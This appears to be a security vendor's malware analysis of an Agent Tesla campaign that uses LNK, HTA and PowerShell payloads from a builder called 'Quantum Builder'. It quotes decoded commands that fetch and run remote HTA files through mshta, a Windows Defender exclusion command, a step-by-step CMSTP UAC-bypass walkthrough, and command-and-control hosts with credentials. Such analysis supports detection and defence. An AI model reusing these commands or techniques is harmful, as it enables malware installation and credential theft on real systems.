Zscaler ThreatLabz has observed a campaign that delivers Agent Tesla, a .NET based keylogger and remote access trojan (RAT) active since 2014, using a builder named “Quantum Builder” sold on the dark web. This campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to similar attacks in the past.
Quantum Builder (aka “Quantum Lnk Builder”) is used to create malicious shortcut files. It has been linked to the Lazarus Group APT due to shared TTPs and source code overlaps, but we cannot confidently attribute this campaign to any specific threat actor. In this campaign, threat actor use Quantum Builder to generate malicious LNK, HTA, and PowerShell payloads which then deliver Agent Tesla on the targeted machines. The payloads generated by the builder employ sophisticated techniques such as:
- User Account Control Bypass using the Microsoft Connection Manager Profile Installer (CMSTP) binary in order to execute the final payload with administrative privileges, and to perform Windows Defender Exclusions
- Utilizing a Multi-Staged Infection Chain integrating various attack vectors involving LOLBins
- Execution of PowerShell scripts in-memory in order to evade detection
- Execution of decoys in order to distract the victims post-infection.
In the following blog, we have performed an in-depth analysis of the Infection Chains delivering Agent Tesla and the comparison of the payloads generated by Quantum Builder.
Key Features of this Attack:
- The threat actors are evolving their tactics by incorporating new infection chains for delivering Agent Tesla on target machines by leveraging the LNK and HTA payloads generated by a builder dubbed “Quantum Builder”
- The Quantum Builder is a builder sold in the cybercrime marketplace and is capable of generating LNK, HTA, and ISO payloads consisting of sophisticated techniques to download and execute the final payload with a Multi-Staged attack Chain.
- The In-memory PowerShell scripts decrypted by Quantum Builder-generated HTA file perform User Account Control (UAC) Bypass via CMSTP in order to execute the final payload (Agent Tesla) with Administrative rights. UAC Bypass is also used to perform Windows Defender exclusions on the endpoint system.
- Utilizes Living Off the Land Binaries (LOLBins) to evade detections and camouflage the malicious activity.
- Incorporates techniques like Decoys, UAC Prompts and In-memory PowerShell to execute the final payload. These Techniques are regularly updated by the Developers of the Quantum Builder.
Infection Chain:
The novel infection chain commences with a spear phishing email which consists of a LNK File bundled as a GZIP Archive. Upon execution of the LNK File, the embedded PowerShell code spawns MSHTA which further executes the HTA File hosted on the Remote server.
The HTA File then decrypts a PowerShell loader script which decrypts and loads another PowerShell script after performing AES Decryption and GZIP Decompression. The decrypted PowerShell script is the Downloader PS Script, which first downloads the Agent Tesla binary from a remote server, and then executes it with administrative privileges by performing a UAC Bypass using the CMSTP.
Finally, the Agent Tesla is executed on the target machine with administrative privileges.
Fig 1. Infection Chain
Infection Chain - Technical Analysis:
As discussed earlier, the Infection Chain starts with a spear phishing email with the subject: “New Order Confirmation - Guangdong Nanz Technology co. ltd.” GuangDong Nanz Technology is a Chinese Manufacturing Company and a leading supplier of Lump & Rock Sugar from Guangdong, China.
Fig 2. Spear phishing Email with attached malicious .LNK File
The spear phishing email consists of a GZIP Archive as an attachment. This archive is bundled with a Malicious .LNK (Windows Shortcut File) file with a PDF icon that lures the victim into execution as shown in the above screenshot.
Once executed, the .LNK File runs an obfuscated PowerShell code which at first decrypts two base64 encoded strings using FromBase64String() and then XOR decrypts both the decoded strings using a hardcoded Single-Byte XOR Key: 0x77. The decrypted strings are then combined forming the following command “IEX mshta https[:]//filebin.net/njqyvfot61w0tu9a/ordr[.]hta”
Fig 3. Obfuscated PowerShell Code executed via the .LNK File
The Invoke-Expression command is then executed which spawns the mshta.exe utility to execute a HTML Application (.HTA) file hosted on a remote server, whose URL is an argument to mshta binary. The MSHTA allows the threat actors to proxy the execution of arbitrary code through a trusted utility as shown in the screenshot below.
Fig 4. Executes a HTA File hosted on a Remote Server via MSHTA
The HTML Application (HTA) File executed by the MSHTA via the .LNK File contains multiple junk VBScript functions of around 1000 lines and consists of only a single function which is used for performing the malicious activity. The main malicious function first initiates an Encrypted Array and then passes it to a decryption function as shown in the below figure.
Fig 5. HTA File - Main Function
Next, the Decryption Routine checks whether the input is an Array by checking the VarType() as “8204” and then decrypts the Array by subtracting each value of the Array by a hard coded key value “37166” and then converting them into characters. These decrypted characters are then concatenated together forming a PowerShell Script as seen in the following screenshot.
Fig 6. HTA File - PS Script Decryption Routine
A similar Decryption routine is performed for decrypting the string “Wscript.Shell” with an Encrypted Array as an input. Once decryption of the PowerShell script and the Shell Object string is completed, the malicious function creates an Wscript.Shell Object via CreateObject() and then executes the Decrypted PowerShell Script via the Run Method.
Fig 7. HTA File - PowerShell Script Execution
Then, the Decrypted Loader PowerShell is executed in the form of a Hidden Window with the execution policy set as Unrestricted. The main aim of this Loader PowerShell Script is to decrypt another Downloader PowerShell Script by first performing an AES Decryption routine against an encrypted blob of data with a base64 encoded key. Once the AES decryption is completed, the decrypted value is then GZIP Decompressed which provides us with the new Decrypted PowerShell script, which is executed in-memory via Invoke-Expression. The complete code snippet with pointers can be seen in the screenshot below for better understanding.
Fig 8. Execution of New PowerShell Script - AES Decrypted and GZIP Decompressed
The AES Decrypted and GZIP Decompressed Downloader PowerShell Script executed by the IEX function is the key PowerShell Script performing following malicious actions:
- Downloads the Final Agent Tesla Payload from the Remote Server
- Performs CMSTP User Account Control (UAC) Bypass -
- To execute Agent Tesla with administrative privileges
- To exclude the AppData directory (Contains the Agent Tesla Binary) from the Windows Defender
- Hides the Agent Tesla Binary by manipulating the File Attributes
The routine first downloads the Agent Tesla binary from the remote server by initially fetching the AppData path from the Environment Variable and then concatenating it with the hardcoded binary name “MuUQDuaFNoGmHQE.exe”.
Further, it checks whether the binary path already exists. If the path exists, the PS Script executes the CMSTP UAC Bypass which then executes the binary (Agent Tesla) with administrative privileges. If not, an encrypted array is passed as an argument to the Decryption routine as seen in the screenshot below.
Fig 9. Decrypted PowerShell Script
Now, the Decryption routine decrypts the Array by subtracting each value of the Array by a hard coded key value “79114”. In this case the decrypted string is the following download URL: https[:]//filebin.net/e730ez2etlh3weer/MuUQDuaFNoGmHQE[.]exe which hosts the Final Agent Tesla payload.
Fig 10. Decryption of Downloader URL
The Decrypted Download URL is then passed on to a Downloader function which first decrypts the Net.WebClient strings and then initializes a New Web Client Object. Further, it executes the WebClient.DownloadData() function with the filebin[.]net URL as the argument. The DownloadData() function downloads the resource as a Byte array from the filebin[.]net URL as seen in the following screenshot.
Fig 11. Downloads the Agent Tesla from Remote Server
The Downloaded Agent Tesla binary is then written to the disk via WriteAllBytes() function at the following path: “C:\Users\<username>\AppData\Roaming\MuUQDuaFNoGmHQE.exe”
Fig 12. Writes the downloaded Agent Tesla binary in AppData Directory
Next, the PowerShell Script performs the CMSTP User Account Control Bypass in order to execute the Agent Tesla binary with Administrative privileges. CMSTP is the Microsoft Connection Manager Profile Installer used for installing or removing the connection manager service profiles and is distributed by Microsoft. The CMSTP accepts an INF (Installation Information) File as the argument for installing the service profile.
In this case, the threat actors abuse the CMSTP to bypass UAC with the help of a malicious INF file which contains the commands to be executed. Once the CMSTP binary tries to install the INF file, the CMSTP in the background executes the COM interface CMLUAUTIL which is auto-elevated, allowing the malicious commands to be executed with elevated privileges.
In our case, the path of the Agent Tesla binary is passed as an argument to the CMSTP UAC Bypass function in the PS Script. The function initially decodes a huge block of base64 encoded data along with the path of the binary being concatenated within the decoded data as portrayed in the screenshot below.
Fig 13. CMSTP UAC Bypass Function
The base64 decoded data is a PowerShell based CMSTP UAC Bypass PoC available on Github: link. The decoded PowerShell script is then base64 encoded and further executed in a encoded fashion (-Encoded) with a hidden window as seen in the screenshot below.
Fig 14. Execution of CMSTP UAC Bypass PS Script
Further, the PowerShell based CMSTP UAC Bypass PoC script upon execution writes a malicious INF file in the Temp directory wherein the $CommandToExecute variable in the PS Script is the path of the Agent Tesla binary. Therefore, the malicious INF file written on disk consists of the path to the Agent Tesla binary as the command to be executed with elevated privileges upon execution of CMSTP.exe, as shown in the screenshot below.
Fig 15. Malicious INF File with command to be executed
Once the INF file is written in the Temp Directory the PowerShell script spawns a new process “cmstp.exe” with “/au $InfFileLocation” as the arguments, which then installs the malicious INF File, as shown below.
Fig 16. Execution of CMSTP.exe with the malicious INF File as the argument
Now while the installation of the INF file is in process by the cmstp.exe, the commands in the RunPreSetupCommandsSection parameter are executed with Administrative privileges. The script sends an [ENTER] keystroke input across to an active Window Application in order to automate the process using SendKeys.SendWait() function.
Fig 17. Sends [ENTER] keystroke to trigger the UAC Bypass
In our case, the RunPreSetupCommandSection parameter in the malicious INF consists of the path to the Agent Tesla binary residing in the AppData Directory. Therefore, when the cmstp.exe is spawned with the malicious INF as the argument, the COM interface CMLUAUTIL is auto-elevated. This executes the malware with administrative privileges, bypassing the UAC as seen in the screenshot below.
Fig 18. Agent Tesla malware executed with Administrative privileges bypassing the UAC
Once Agent Tesla is executed with elevated privileges, it performs malicious activities such as stealing personal data from Browsers, Mail Clients and logs keystrokes. It is also capable of keylogging, form-grabbing, Clipboard hijacking similar to the older variants of Agent Tesla and further communicates with the FTP based CnC server: “ftp[.]qurvegraphics[.]com”
Configuration:
Protocol: ftp
Host: ftp[.]qurvegraphics[.]com
Port: 21
Username:eddx@qurvegraphics[.]com
Password: C1WJFi]vTamX
FTP based CnC Communication:
Fig 19. FTP Based Agent Tesla CnC Communication
Furthermore, a similar CMSTP UAC Bypass function is implemented in the PowerShell script to add a Windows Defender Path exclusion for the AppData Directory where the AgenTesla Binary resides. The only difference in this case from the INF end is that the RunPreSetupCommandsSection parameter of the INF File consists of the following command: “PowerShell -NoLogo -WindowStyle hidden -NonInteractive -NoProfile -Execution Policy UnRestricted Add-MpPreference -ExclusionPath $env:AppData” which is executed with administrator privileges bypassing the UAC via cmstp.exe, as discussed earlier.
Fig 20. Window Defender Exclusion via CMSTP UAC Bypass
Along with all of these functions, the PowerShell script also hides the Agent Tesla Binary by manipulating the hidden file attribute. This completes the Infection Chain used by the threat actors to deliver Agent Tesla on the victim machines.
Fig 21. Hides the Final Payload by manipulating the File Attributes
Attack Variations
We came across multiple samples using another variation of the Infection Chain to deliver Agent Tesla on the victim machine. In this variation, the initial .LNK File (PAYMENT.png.lnk) was bundled in a ZIP Archive (PAYMENT.png.zip). The .LNK file in this case is also tasked to execute a HTA File hosted on the remote server by decoding the following command: “Iex mShta http://179[.]43[.]175[.]187/puao/PAYMENT.hta” by converting the integers into characters and then replacing whitespaces and further leveraging MSHTA to execute the HTA file from the remote URL as shown in the screenshot below.
Fig 22. Execution of Remote HTA File via .LNK
The HTA File executed by MSHTA in this case is identical to the one used in the previous infection chain, where the Encrypted Array is passed on to the Decryption Function which decrypts the Array by subtracting each value of the Array by a hard coded key value “63194” and then converting them into characters to forms the PowerShell script which is been executed via the Run method.
Fig 23. HTA File decrypts the PowerShell Script
Apart from the Run() Method, in some cases the HTA file leverages the ShellExecute() Method to run the decrypted PowerShell script with the “runas” verb, and would then try to elevate permissions by spawning a UAC Prompt at the user end.
Fig 24. UAC Prompt via ShellExecute() “RunAs”
Further, the Decrypted Downloader PowerShell in this case is also similar to the previously analyzed PowerShell script, except that it does not incorporate the AES Decryption PS Stage and the CMSTP UAC Bypass component in the following script. In this variation, the Downloader PowerShell Script first decrypts the Download URL “179[.]43[.]175[.]187/puao/PAYMENTS[.]exe” using a similar decryption function with hardcoded key value as “58146”, and then downloads and writes the Agent Tesla payload from the Download URL to the AppData directory using DownloadData() function. Once written, it executes the Agent Tesla payload from the AppData path using Start-Process(); if the extension of the payload is “.dll” then it uses rundll32.exe to load the DLL in the virtual memory.
Fig 25. Downloads and Executes Agent Tesla via the Decrypted PowerShell Script
In some cases we also came across In-memory decrypted PowerShell scripts which downloaded and executed a decoy file using Invoke-Item function. This was done to distract the victims from the malicious activities as shown in the screenshot below.
Fig 26. Decoy Execution
The final Agent Tesla payload in this case uses SMTP based CnC Communication with the following configuration:
Protocol: "SMTP",
Email Address: [email protected]
Password: Sa4=3jj*E{#_
SMTP Server: mail[.]thesharpening[.]com[.]au
Fig 27. SMTP based CnC Communication performed by Agent Tesla
‘Quantum’ Builder Analysis & Comparison:
From our analysis of the Infection chain explained previously, we were able to deduce that the LNK, HTA payloads and the in-memory PowerShell scripts were generated by a builder named “Quantum Builder”. The Quantum Builder is a completely customizable builder capable of generating evasive LNK, HTA, and ISO Payloads incorporated with advanced techniques such as UAC Bypass, In-memory payloads as a method to evade detection at any cost, and many more. The builder is sold with various pricing plans in the cybercrime marketplace, and is updated regularly with new techniques to evade detections.
Fig 28. Quantum Builder
We were able to get our hands on Quantum Builder, which allowed us to analyze and compare the generated payloads with the In-the-Wild (ITW) payloads used in the above Agent Tesla campaign. Following is the analysis & comparison below for the HTA and LNK Builder modules.
Module 1 - HTA Builder
The HTA builder accepts the following inputs from the user end in order to build the HTA Payload as shown in the screenshot below
Fig 29. Quantum Builder - HTA Builder
Next, the input values are passed to the HTA Builder function where the values are concatenated and arranged in order to construct the HTA File as can be seen in the screenshot below.
Fig 30. Quantum Builder - HTA Generation (Testing.hta)
Now if we compare the “Testing.hta” code with ShellExecute function in the above screenshot (Fig. 31) with the In-the-Wild HTA ShellExecute function analyzed previously (Fig. 32) tasked with executing the Decrypted PS script and UAC Prompt, we can see similarities between them, verifying that the payloads were generated by the Quantum Builder itself.
Fig 31. In-The-Wild HTA File
Here, the HTA and In-memory PowerShell files change a bit based on the options selected whilst building the payload. Per our analysis, almost all are similar to the files seen in the wild and previously analyzed in the infection chain analysis, proving that they have been generated from the Quantum Builder.
Module 2 - LNK Builder
The LNK Builder module accepts the following values as seen in screenshot below in order to generate a Malicious LNK file.
Fig 32. Quantum Builder - LNK Builder
The input values are then arranged in the required format: Some strings are XOR Encrypted and then arranged in a specific way, and then the LNK (Shortcut) file is created using the CreateShortcut() Function with the pathlink where the LNK file is to be saved. Here in the screenshot, we can take a look at the parameters to the Shortcut file such as the Description, IconLocation, Target Path, Arguments and WindowStyle.
Fig 33. Quantum Builder - LNK Builder
Comparing the PowerShell code in the above screenshot leveraging the “ -join | % { [char] ($_ -bxor”, “[convert]::FromBase64String”, “sal” to the PowerShell code present in the .LNK File from the Agent Tesla campaign shown below, we see that the arguments are identical proving that it was generated by the Quantum Builder.
Fig 34. Agent Tesla Campaign LNK PowerShell code snippet
The builder also can generate ISO payloads bundled with the malware to be delivered, as shown in the below screenshot.
Fig 35. ISO Builder
The Quantum Builder has been used by threat actors in multiple campaigns in the wild to deliver various malware families including:
- RedLine Stealer
- IcedID
- GuLoader
- RemcosRAT and AsyncRAT
Thus, we can conclude that the threat actors are leveraging the “Quantum Builder” in order to generate LNK, HTA and ISO Payloads equipped with advanced techniques (which keep on updating regularly) to deliver various malware on the target machines.
Zscaler Sandbox Coverage:
Figure 36. The Zscaler Cloud Sandbox successfully detected the Downloader.
Conclusion:
Threat actors are continuously evolving their tactics and making use of malware builders sold on the cybercrime marketplace. This Agent Tesla campaign is the latest in a string of attacks in which Quantum Builder has been used to create malicious payloads in campaigns against various organizations. It incorporates sophisticated techniques to evade detections, and the techniques are updated regularly by the developers. The Zscaler ThreatLabz team will continue to monitor these attacks to help keep our customers safe
IoCs:
LNK hash:
3edfa0cf3b7d54c24013e4f0019dba20
bb914889d5edc6b56c666d2e44e1a437
1adc0bd494cd42578ac8c8e726d5ad92
31c341ad31224cc7d38a5c4e80ccb727
f931773a226809669cad91410a57267f
HTA URL:
filebin[.]net/njqyvfot61w0tu9a/ordr[.]hta
filebin[.]net/yiob7vjw7pqow03r/RFQ_270622[.]hta
179[.]43[.]175[.]187/puao/PAYMENT[.]hta
179[.]43[.]175[.]187/puao/PO-M6888722[.]hta
Agent Tesla Download URL:
filebin[.]net/e730ez2etlh3weer/MuUQDuaFNoGmHQE[.]exe
179[.]43[.]175[.]187/puao/PAYMENTS[.]exe
179[.]43[.]175[.]187/puao/PO-M6888757[.]exe
Agent Tesla hashes:
d9433faddcaca526b26f713e27e2505f
213ada506251c477480bd14ea5507bf3
0ebb9d422f8e86458d8fa7f66fe1d0f1
563fda5da81a5e7818d771222e81f6c4
Agent Tesla CnC:
mail[.]thesharpening.com[.]au
ftp[.]qurvegraphics[.]com